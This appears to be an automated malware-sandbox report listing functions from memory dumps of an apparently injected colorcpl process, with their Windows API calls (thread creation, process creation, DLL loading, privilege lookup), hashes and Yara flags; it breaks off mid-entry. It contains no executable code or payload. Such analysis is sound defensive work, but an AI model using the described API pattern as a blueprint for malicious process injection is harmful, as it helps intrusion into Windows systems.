Instruction ID: af6ae490c5d90cd928c93e03d5aab47580d0e391b5580ede46eaba2ac1a991e9
Opcode Fuzzy Hash: 9991cced3fc0db2c8e4fdfaa5586f0f35959442d9804baeb844387004d4d376b
Instruction Fuzzy Hash: E390023522600413F91571584604707004987D2285F91E856A0419558DD676DD52B131

Uniqueness

Uniqueness Score: -1.00%

Function 04382DC0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 04382DCA

Memory Dump Source

Source File: 00000003.00000002.7561551420.0000000004310000.00000040.00001000.00020000.00000000.sdmp, Offset: 04310000, based on PE: true

Associated: 00000003.00000002.7561551420.0000000004439000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.7561551420.000000000443D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_4310000_colorcpl.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 3ca5553897e784e3e807c46a75964f8600b96a5452d079fc192096b3d6b43cdb
Instruction ID: d7e70882a572f29d1aeb11f88111b1934155d454a8c9090381058ef0fd9e5ad3
Opcode Fuzzy Hash: 3ca5553897e784e3e807c46a75964f8600b96a5452d079fc192096b3d6b43cdb
Instruction Fuzzy Hash: F390027522600402F94471584504746004587D2345F51E455A5059554EC679DDD57675

Uniqueness

Uniqueness Score: -1.00%

Function 04382E50 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 04382E5A

Memory Dump Source

Source File: 00000003.00000002.7561551420.0000000004310000.00000040.00001000.00020000.00000000.sdmp, Offset: 04310000, based on PE: true

Associated: 00000003.00000002.7561551420.0000000004439000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.7561551420.000000000443D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_4310000_colorcpl.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 3048b10d5546bbd83840cbc0ea2ddad1eea91b3dbfcdd544fe4b591e112cb66c
Instruction ID: 265a686433d35d527660f10c4c5b5ba98fd97f21b26a15b7ba856db202fef546
Opcode Fuzzy Hash: 3048b10d5546bbd83840cbc0ea2ddad1eea91b3dbfcdd544fe4b591e112cb66c
Instruction Fuzzy Hash: 1B90026536600442F90471584514B060045C7E3345F51E459E1059554DC639DC527136

Uniqueness

Uniqueness Score: -1.00%

Function 04382F00 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 04382F0A

Memory Dump Source

Source File: 00000003.00000002.7561551420.0000000004310000.00000040.00001000.00020000.00000000.sdmp, Offset: 04310000, based on PE: true

Associated: 00000003.00000002.7561551420.0000000004439000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.7561551420.000000000443D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_4310000_colorcpl.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: e77a90860271a4b951da5a131abc3b650e45320c64b1defe017160fef1fd0dbe
Instruction ID: 642571577c42e09b041841ae6930ada005e2feea77d5515a54c045c584d7c32f
Opcode Fuzzy Hash: e77a90860271a4b951da5a131abc3b650e45320c64b1defe017160fef1fd0dbe
Instruction Fuzzy Hash: 6690022523680042FA0475684D14B07004587D2347F51E559A0149554CC935DC616531

Uniqueness

Uniqueness Score: -1.00%

Function 043829F0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 043829FA

Memory Dump Source

Source File: 00000003.00000002.7561551420.0000000004310000.00000040.00001000.00020000.00000000.sdmp, Offset: 04310000, based on PE: true

Associated: 00000003.00000002.7561551420.0000000004439000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.7561551420.000000000443D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_4310000_colorcpl.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: d77dc1ba4d05ac57393d15c55b24749def5391709224821f7841c2ab02f5aeb2
Instruction ID: 71784bc31a2dd7feb7694e9d0aba72ca97fea6afa3b83b4a8da22e5b4ae1751a
Opcode Fuzzy Hash: d77dc1ba4d05ac57393d15c55b24749def5391709224821f7841c2ab02f5aeb2
Instruction Fuzzy Hash: DE900229236000032909B5580704507008687D7395351E465F100A550CD631DC616131

Uniqueness

Uniqueness Score: -1.00%

Function 04382A80 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 04382A8A

Memory Dump Source

Source File: 00000003.00000002.7561551420.0000000004310000.00000040.00001000.00020000.00000000.sdmp, Offset: 04310000, based on PE: true

Associated: 00000003.00000002.7561551420.0000000004439000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.7561551420.000000000443D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_4310000_colorcpl.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 2a473251032106df5d4c15b61b4445fec8d532b74c663ab523b37ed63942a876
Instruction ID: 0d58c7f74da043a583c756ce32b81ec8af437dd4691182222d1b81ae4192fb9b
Opcode Fuzzy Hash: 2a473251032106df5d4c15b61b4445fec8d532b74c663ab523b37ed63942a876
Instruction Fuzzy Hash: 5590026522700003690971584514616404A87E2245B51E465E1009590DC535DC917135

Uniqueness

Uniqueness Score: -1.00%

Function 04382B10 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 04382B1A

Memory Dump Source

Source File: 00000003.00000002.7561551420.0000000004310000.00000040.00001000.00020000.00000000.sdmp, Offset: 04310000, based on PE: true

Associated: 00000003.00000002.7561551420.0000000004439000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.7561551420.000000000443D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_4310000_colorcpl.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: b82fcc3be8607bfcfa3856d02f4467aed3b59d7ff2088b4e256deb7162052104
Instruction ID: db48c3717651868d4f82ef279297beecd46719a8c186c37ed09ce2d5ac92bf98
Opcode Fuzzy Hash: b82fcc3be8607bfcfa3856d02f4467aed3b59d7ff2088b4e256deb7162052104
Instruction Fuzzy Hash: AC90023522600802F9847158450464A004587D3345F91E459A001A654DCA35DE5977B1

Uniqueness

Uniqueness Score: -1.00%

Function 04382B00 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 04382B0A

Memory Dump Source

Source File: 00000003.00000002.7561551420.0000000004310000.00000040.00001000.00020000.00000000.sdmp, Offset: 04310000, based on PE: true

Associated: 00000003.00000002.7561551420.0000000004439000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.7561551420.000000000443D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_4310000_colorcpl.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: d84dcfd5c12bd2cd77839ff440de809b250c082dc9211c600f7cdd39d80bc170
Instruction ID: fcfb8000f6cff31d6c7d164f8de6224809f27fbcc5bef3152da5ce2758422230
Opcode Fuzzy Hash: d84dcfd5c12bd2cd77839ff440de809b250c082dc9211c600f7cdd39d80bc170
Instruction Fuzzy Hash: C290023522A04842F94471584504A46005587D2349F51E455A0059694DD635DD55B671

Uniqueness

Uniqueness Score: -1.00%

Function 04382B90 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 04382B9A

Memory Dump Source

Source File: 00000003.00000002.7561551420.0000000004310000.00000040.00001000.00020000.00000000.sdmp, Offset: 04310000, based on PE: true

Associated: 00000003.00000002.7561551420.0000000004439000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.7561551420.000000000443D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_4310000_colorcpl.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: b0a3065b4c173f16f7ff4935fd7ebd022719ee728c9eecd4d3e3824e86f11a14
Instruction ID: b767a94eff4c501f23f731ae3651e13a87b03ae16fa7e5b1e80d0c5505bf8135
Opcode Fuzzy Hash: b0a3065b4c173f16f7ff4935fd7ebd022719ee728c9eecd4d3e3824e86f11a14
Instruction Fuzzy Hash: 6690023522608802F9147158850474A004587D2345F55E855A4419658DC6B5DC917131

Uniqueness

Uniqueness Score: -1.00%

Function 04382B80 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 04382B8A

Memory Dump Source

Source File: 00000003.00000002.7561551420.0000000004310000.00000040.00001000.00020000.00000000.sdmp, Offset: 04310000, based on PE: true

Associated: 00000003.00000002.7561551420.0000000004439000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.7561551420.000000000443D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_4310000_colorcpl.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: a9d5034677e11e423fcce3bffc64d3de71c20e73690a87df7a8501b0f6560002
Instruction ID: fb6c38113055cb420bb7c3cc1b4b45f48c9a7202d2abfaa6a21cd88a1c63287a
Opcode Fuzzy Hash: a9d5034677e11e423fcce3bffc64d3de71c20e73690a87df7a8501b0f6560002
Instruction Fuzzy Hash: 6790023522600842F90471584504B46004587E2345F51E45AA0119654DC635DC517531

Uniqueness

Uniqueness Score: -1.00%

Function 04382BC0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 04382BCA

Memory Dump Source

Source File: 00000003.00000002.7561551420.0000000004310000.00000040.00001000.00020000.00000000.sdmp, Offset: 04310000, based on PE: true

Associated: 00000003.00000002.7561551420.0000000004439000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.7561551420.000000000443D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_4310000_colorcpl.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 55b6a28702ba37a1a64aa1e58800210d430ab6b7b6efb48084ca7f4323607650
Instruction ID: 87298464648a6ce9d54e62566a570659c8f4aead463813bdf102b2417939c2b1
Opcode Fuzzy Hash: 55b6a28702ba37a1a64aa1e58800210d430ab6b7b6efb48084ca7f4323607650
Instruction Fuzzy Hash: A690023522600402F90475985508646004587E2345F51F455A5019555EC675DC917131

Uniqueness

Uniqueness Score: -1.00%

Function 00159070 Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 90
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(000007D0), ref: 00159118

Strings

wininet.dll, xrefs: 001590CE, 001590D7
net.dll, xrefs: 001590E1, 00159167, 0015913F, 0015914B, 00159173

Memory Dump Source

Source File: 00000003.00000002.7558000082.0000000000140000.00000040.80000000.00040000.00000000.sdmp, Offset: 00140000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_140000_colorcpl.jbxd

Yara matches

Similarity

API ID: Sleep
String ID: net.dll$wininet.dll
API String ID: 3472027048-1269752229
Opcode ID: d65eba21659510116b489bbcb7a02bb400bd43ec9c57b198469d48801f1f5de9
Instruction ID: b91ff0b8c76140a354ecf5d6fdb78e9707fba1f330cfa94e8b181be78ba85f55
Opcode Fuzzy Hash: d65eba21659510116b489bbcb7a02bb400bd43ec9c57b198469d48801f1f5de9
Instruction Fuzzy Hash: F13180B2500645FBC714DF64C8C5FA7B7B8FB48701F10841DFA2A6B245D730A554CBA5

Uniqueness

Uniqueness Score: -1.00%

Function 00159066 Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 82
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(000007D0), ref: 00159118

Strings

wininet.dll, xrefs: 001590CE, 001590D7
net.dll, xrefs: 001590E1, 0015913F, 0015914B

Memory Dump Source

Source File: 00000003.00000002.7558000082.0000000000140000.00000040.80000000.00040000.00000000.sdmp, Offset: 00140000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_140000_colorcpl.jbxd

Yara matches

Similarity

API ID: Sleep
String ID: net.dll$wininet.dll
API String ID: 3472027048-1269752229
Opcode ID: fd20e17f23a747bd5eefc8297666051aac94770c430063f03a8a529e4d9c4248
Instruction ID: 9eb857687d70fca14710719c9f87d5b9927e4e7fa3e436a1187b1132cfa597a3
Opcode Fuzzy Hash: fd20e17f23a747bd5eefc8297666051aac94770c430063f03a8a529e4d9c4248
Instruction Fuzzy Hash: 0C21D0B1A00605FBC724EF64C8C6BABB7B4FB48701F10801DFA296F245D774A554CBA5

Uniqueness

Uniqueness Score: -1.00%

Function 0015A652 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 27
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlFreeHeap.NTDLL(00000060,00000000,.z`,007A002E,00000000,00000060,00000000,00000000,?,?,00700069,?,00143AF8), ref: 0015A68D

Strings

.z`, xrefs: 0015A67C, 0015A688

Memory Dump Source

Source File: 00000003.00000002.7558000082.0000000000140000.00000040.80000000.00040000.00000000.sdmp, Offset: 00140000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_140000_colorcpl.jbxd

Yara matches

Similarity

API ID: FreeHeap
String ID: .z`
API String ID: 3298025750-1441809116
Opcode ID: 000deff5e65f910ef10bd6b89f6027ecee68f0866502698eca5f7146a28515c4
Instruction ID: 9ccb97f6e47d976d002ab481376c19710b6b2ad19dd6d295484b79e14e3dfb4a
Opcode Fuzzy Hash: 000deff5e65f910ef10bd6b89f6027ecee68f0866502698eca5f7146a28515c4
Instruction Fuzzy Hash: 8DE039B1600214BBCB24DF65DC45EEB7768EF883A0F118149F91CA7241D631E900CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 0015A660 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 24
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlFreeHeap.NTDLL(00000060,00000000,.z`,007A002E,00000000,00000060,00000000,00000000,?,?,00700069,?,00143AF8), ref: 0015A68D

Strings

.z`, xrefs: 0015A67C, 0015A688

Memory Dump Source

Source File: 00000003.00000002.7558000082.0000000000140000.00000040.80000000.00040000.00000000.sdmp, Offset: 00140000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_140000_colorcpl.jbxd

Yara matches

Similarity

API ID: FreeHeap
String ID: .z`
API String ID: 3298025750-1441809116
Opcode ID: 540c4433df045b48126259b9153db85e530e9dd1f040c1eb84158749b6bc4ef9
Instruction ID: 67e6779f62af814d20a229ef45a9d524a95116f0278277dcd4e3340b1cc08019
Opcode Fuzzy Hash: 540c4433df045b48126259b9153db85e530e9dd1f040c1eb84158749b6bc4ef9
Instruction Fuzzy Hash: 53E01AB1200204ABD714DF59CC45EA777ACAF88750F014555BD1C5B241C630E9148AB0

Uniqueness

Uniqueness Score: -1.00%

Function 00148308 Relevance: 3.1, APIs: 2, Instructions: 61
threadwindowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

PostThreadMessageW.USER32(0065002E,00000111,00000000,00000000,00000000), ref: 0014836A
PostThreadMessageW.USER32(0065002E,00008003,00000000,?,00000000), ref: 0014838B

Memory Dump Source

Source File: 00000003.00000002.7558000082.0000000000140000.00000040.80000000.00040000.00000000.sdmp, Offset: 00140000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_140000_colorcpl.jbxd

Yara matches

Similarity

API ID: MessagePostThread
String ID:
API String ID: 1836367815-0
Opcode ID: 31f448e6930bf498ab7fcf4aa31a6a3578088f79db4a1caf4fdd14d430d4a3d2
Instruction ID: d52b317d2736782bd3aa911b0082ebe944c4a3ab21e9a5bd0216f310eba15962
Opcode Fuzzy Hash: 31f448e6930bf498ab7fcf4aa31a6a3578088f79db4a1caf4fdd14d430d4a3d2
Instruction Fuzzy Hash: D601D6719803287BE721AA949C43FBE765CAF50F51F050114FF04BE1C1E794690543E2

Uniqueness

Uniqueness Score: -1.00%

Function 001482D3 Relevance: 3.1, APIs: 2, Instructions: 55
threadwindowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

PostThreadMessageW.USER32(0065002E,00000111,00000000,00000000,00000000), ref: 0014836A
PostThreadMessageW.USER32(0065002E,00008003,00000000,?,00000000), ref: 0014838B

Memory Dump Source

Source File: 00000003.00000002.7558000082.0000000000140000.00000040.80000000.00040000.00000000.sdmp, Offset: 00140000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_140000_colorcpl.jbxd

Yara matches

Similarity

API ID: MessagePostThread
String ID:
API String ID: 1836367815-0
Opcode ID: 8eb4990325fd24e63c09389d55fce88a332833a5431b185dc4f25e916ca3cf1e
Instruction ID: 96fc79a48d23139b604d0d1ceba9d67f8bf339d519608988fc320875126b749b
Opcode Fuzzy Hash: 8eb4990325fd24e63c09389d55fce88a332833a5431b185dc4f25e916ca3cf1e
Instruction Fuzzy Hash: 29014731A802187AE721AAA44C03FFE2B68AF50F15F080158FF00BB1D2DB94690A43F1

Uniqueness

Uniqueness Score: -1.00%

Function 00148310 Relevance: 3.1, APIs: 2, Instructions: 55
threadwindowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

PostThreadMessageW.USER32(0065002E,00000111,00000000,00000000,00000000), ref: 0014836A
PostThreadMessageW.USER32(0065002E,00008003,00000000,?,00000000), ref: 0014838B

Memory Dump Source

Source File: 00000003.00000002.7558000082.0000000000140000.00000040.80000000.00040000.00000000.sdmp, Offset: 00140000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_140000_colorcpl.jbxd

Yara matches

Similarity

API ID: MessagePostThread
String ID:
API String ID: 1836367815-0
Opcode ID: 3172d27be0b016439e5481d8b21c313a41ffbcab7864ad54bb0489d0eefa33a4
Instruction ID: 1c6ef29eb9015d781a37540c8f9434cb01cc59bb99959d6f5d07711352ab214d
Opcode Fuzzy Hash: 3172d27be0b016439e5481d8b21c313a41ffbcab7864ad54bb0489d0eefa33a4
Instruction Fuzzy Hash: FF01A731A8022877E721AA949C43FFE776CAF50F51F090114FF04BA1C2E7A4690546F6

Uniqueness

Uniqueness Score: -1.00%

Function 0014F6F1 Relevance: 1.6, APIs: 1, Instructions: 56
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetErrorMode.KERNELBASE(00008003,?,00148D14,?), ref: 0014F6EB

Memory Dump Source

Source File: 00000003.00000002.7558000082.0000000000140000.00000040.80000000.00040000.00000000.sdmp, Offset: 00140000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_140000_colorcpl.jbxd

Yara matches

Similarity

API ID: ErrorMode
String ID:
API String ID: 2340568224-0
Opcode ID: 5506c29575af367be1a41aae1a63a11b804252031ea9c57b0ddcaa917557560d
Instruction ID: 036e354df9fb098b880a0b5e8c1582c56da1f030ed1b77a9ac4fc6df478787bb
Opcode Fuzzy Hash: 5506c29575af367be1a41aae1a63a11b804252031ea9c57b0ddcaa917557560d
Instruction Fuzzy Hash: 3801F97194420C6EEB20EFA48C86FBB73A89B64700F04009CF91CDB393E7A4998587A1

Uniqueness

Uniqueness Score: -1.00%

Function 0014ACE0 Relevance: 1.5, APIs: 1, Instructions: 48libraryloaderCOMMON

Download Yara Rule

APIs

LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 0014AD52

Memory Dump Source

Source File: 00000003.00000002.7558000082.0000000000140000.00000040.80000000.00040000.00000000.sdmp, Offset: 00140000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_140000_colorcpl.jbxd

Yara matches

Similarity

API ID: Load
String ID:
API String ID: 2234796835-0
Opcode ID: dc2098e385e942efcd48a296202403441f5905bb34daa24398974f8d6af8945c
Instruction ID: 0b165c089f934de768f45c11b8871c54269ca6f5a6f22828cca2ba90cb736d35
Opcode Fuzzy Hash: dc2098e385e942efcd48a296202403441f5905bb34daa24398974f8d6af8945c
Instruction Fuzzy Hash: 6B0100B5D4020DABDB10DAE4DC42F9DB3789B54309F104195AD199B291F731EA58CB91

Uniqueness

Uniqueness Score: -1.00%

Function 0015A6D0 Relevance: 1.5, APIs: 1, Instructions: 42processCOMMON

Download Yara Rule

APIs

CreateProcessInternalW.KERNELBASE(?,00000000,?,?,00000000,00000000,?,?,?,00000000,00000000,?,?,00000000,?,00000000), ref: 0015A724

Memory Dump Source

Source File: 00000003.00000002.7558000082.0000000000140000.00000040.80000000.00040000.00000000.sdmp, Offset: 00140000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_140000_colorcpl.jbxd

Yara matches

Similarity

API ID: CreateInternalProcess
String ID:
API String ID: 2186235152-0
Opcode ID: 91c10d5b09b6f5ff7ee6d1e22534128eefdcfa4a5b7191d55d386dbf4554461c
Instruction ID: 294bbcb020b6db90ddc9fdc300684d412086fc28d967784fcc7e9272563fc8c6
Opcode Fuzzy Hash: 91c10d5b09b6f5ff7ee6d1e22534128eefdcfa4a5b7191d55d386dbf4554461c
Instruction Fuzzy Hash: 2501B2B2210108BFCB54DF89DC80EEB77ADAF8C754F158258FA1D97241C630E851CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 0015A692 Relevance: 1.5, APIs: 1, Instructions: 39memoryCOMMON

Download Yara Rule

APIs

RtlFreeHeap.NTDLL(00000060,00000000,.z`,007A002E,00000000,00000060,00000000,00000000,?,?,00700069,?,00143AF8), ref: 0015A68D

Memory Dump Source

Source File: 00000003.00000002.7558000082.0000000000140000.00000040.80000000.00040000.00000000.sdmp, Offset: 00140000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_140000_colorcpl.jbxd

Yara matches

Similarity

API ID: FreeHeap
String ID:
API String ID: 3298025750-0
Opcode ID: 07ae0a83b265b9510de18d793e96a2bfdbe8ee5d3550a51959216930747e1b6a
Instruction ID: 8ba9d468d57caf6248e58994bccfa8e123c58f35a07380d93ffd5bf7789828b2
Opcode Fuzzy Hash: 07ae0a83b265b9510de18d793e96a2bfdbe8ee5d3550a51959216930747e1b6a
Instruction Fuzzy Hash: 71F0E271640114BFD720EF98DC40EEB739CDF88350F498295F91C5F242C631A9098BE1

Uniqueness

Uniqueness Score: -1.00%

Function 00159193 Relevance: 1.5, APIs: 1, Instructions: 37threadCOMMON

Download Yara Rule

APIs

CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000,?,?,0014F040,?,?,00000000), ref: 001591DC

Memory Dump Source

Source File: 00000003.00000002.7558000082.0000000000140000.00000040.80000000.00040000.00000000.sdmp, Offset: 00140000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_140000_colorcpl.jbxd

Yara matches

Similarity

API ID: CreateThread
String ID:
API String ID: 2422867632-0
Opcode ID: 569a6075d558e6162664151ccebed9b042a398482b9557b92f02e60807001ad4
Instruction ID: 12c6ee173195c360954a43332b8ed975eac7a58608d25350fc5cb42e17a27eed
Opcode Fuzzy Hash: 569a6075d558e6162664151ccebed9b042a398482b9557b92f02e60807001ad4
Instruction Fuzzy Hash: B1F0EC36280611BFF37056588C43FD77768DB91B61F540139FE19AF1C2C7A4F80686A4

Uniqueness

Uniqueness Score: -1.00%

Function 001591A0 Relevance: 1.5, APIs: 1, Instructions: 36threadCOMMON

Download Yara Rule

APIs

CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000,?,?,0014F040,?,?,00000000), ref: 001591DC

Memory Dump Source

Source File: 00000003.00000002.7558000082.0000000000140000.00000040.80000000.00040000.00000000.sdmp, Offset: 00140000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_140000_colorcpl.jbxd

Yara matches

Similarity

API ID: CreateThread
String ID:
API String ID: 2422867632-0
Opcode ID: d10c338030a63e1013b910e3c2063ff447c03e609e320231460ab1a77d3652e7
Instruction ID: 4a57af2589dcd4e29f4761301f3246b6e89863f5309bbf6a8a91ba99fc4ff28c
Opcode Fuzzy Hash: d10c338030a63e1013b910e3c2063ff447c03e609e320231460ab1a77d3652e7
Instruction Fuzzy Hash: CEE06D373902147AE2206599AC03FA7B79CDB91B61F14002AFA0DEB2C1D695F80542A5

Uniqueness

Uniqueness Score: -1.00%

Function 0015A7B1 Relevance: 1.5, APIs: 1, Instructions: 30COMMON

Download Yara Rule

APIs

LookupPrivilegeValueW.ADVAPI32(00000000,?,0014F1C2,0014F1C2,?,00000000,?,?), ref: 0015A7F0

Memory Dump Source

Source File: 00000003.00000002.7558000082.0000000000140000.00000040.80000000.00040000.00000000.sdmp, Offset: 00140000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_140000_colorcpl.jbxd

Yara matches

Similarity

API ID: LookupPrivilegeValue
String ID:
API String ID: 3899507212-0
Opcode ID: d0ba2a6c9b03dfdcb9415e01af40c58c376dc1d9d446cf8b57bdbed0a2ae8c20
Instruction ID: 16479402e4e2220dfd1a785155effe097e29811915664356c28ccf98c4e7cb07
Opcode Fuzzy Hash: d0ba2a6c9b03dfdcb9415e01af40c58c376dc1d9d446cf8b57bdbed0a2ae8c20
Instruction Fuzzy Hash: 0CF0E5B5200248EFD710DF54CC80EEB7B69EF49310F118185FD9D57682DA30E816CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 0015A620 Relevance: 1.5, APIs: 1, Instructions: 24memoryCOMMON

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(00154526,?,00154C9F,00154C9F,?,00154526,?,?,?,?,?,00000000,00000000,?), ref: 0015A64D

Memory Dump Source

Source File: 00000003.00000002.7558000082.0000000000140000.00000040.80000000.00040000.00000000.sdmp, Offset: 00140000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_140000_colorcpl.jbxd

Yara matches

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: ecb7fbf7fbf697e7ed6b19bb654fc0845e00bd12648aab82589a03cf581b1705
Instruction ID: 0c6b5a7572f3f35230471b985120a6f4ce0ec859b184c782f55a2ab66187db5b
Opcode Fuzzy Hash: ecb7fbf7fbf697e7ed6b19bb654fc0845e00bd12648aab82589a03cf581b1705
Instruction Fuzzy Hash: B8E012B1200208ABDB14EF99CC41EAB77ACAF88654F118559BE1C5B242C630F9148AB0

Uniqueness

Uniqueness Score: -1.00%

Function 0015A7C0 Relevance: 1.5, APIs: 1, Instructions: 24COMMON

Download Yara Rule

APIs

LookupPrivilegeValueW.ADVAPI32(00000000,?,0014F1C2,0014F1C2,?,00000000,?,?), ref: 0015A7F0

Memory Dump Source

Source File: 00000003.00000002.7558000082.0000000000140000.00000040.80000000.00040000.00000000.sdmp, Offset: 00140000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_140000_colorcpl.jbxd

Yara matches

Similarity

API ID: LookupPrivilegeValue
String ID:
API String ID: 3899507212-0
Opcode ID: c524c4dcdeb286be68a002add1a356f71d86b8c938967e6280f3f61150ebef6a
Instruction ID: ad8335997f5d8f2d2657feae330d5ff0035f996268798d8e59a6578e80d2ec0b
Opcode Fuzzy Hash: c524c4dcdeb286be68a002add1a356f71d86b8c938967e6280f3f61150ebef6a
Instruction Fuzzy Hash: 8FE01AB1200208ABDB10DF49CC85EEB37ADAF88650F018155BE1C5B241CA30E8148BF5

Uniqueness

Uniqueness Score: -1.00%

Function 0014F6B8 Relevance: 1.5, APIs: 1, Instructions: 20COMMON

Download Yara Rule

APIs

SetErrorMode.KERNELBASE(00008003,?,00148D14,?), ref: 0014F6EB

Memory Dump Source

Source File: 00000003.00000002.7558000082.0000000000140000.00000040.80000000.00040000.00000000.sdmp, Offset: 00140000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_140000_colorcpl.jbxd

Yara matches

Similarity

API ID: ErrorMode
String ID:
API String ID: 2340568224-0
Opcode ID: a93da67b593810d0bed12bdaf9779deb83a6657171afce67af401a22746db5df
Instruction ID: dab39d6a8298a713f28b5739c616e7961bdb35f966d71bb6fcd3a51bc2b982fa
Opcode Fuzzy Hash: a93da67b593810d0bed12bdaf9779deb83a6657171afce67af401a22746db5df
Instruction Fuzzy Hash: A7D05E726842013BFA20EEE4DC43F6A26CAAB64759F1945B5F98CEB7D7DA64D0018121

Uniqueness

Uniqueness Score: -1.00%

Function 0014F6C0 Relevance: 1.5, APIs: 1, Instructions: 19COMMON

Download Yara Rule

APIs

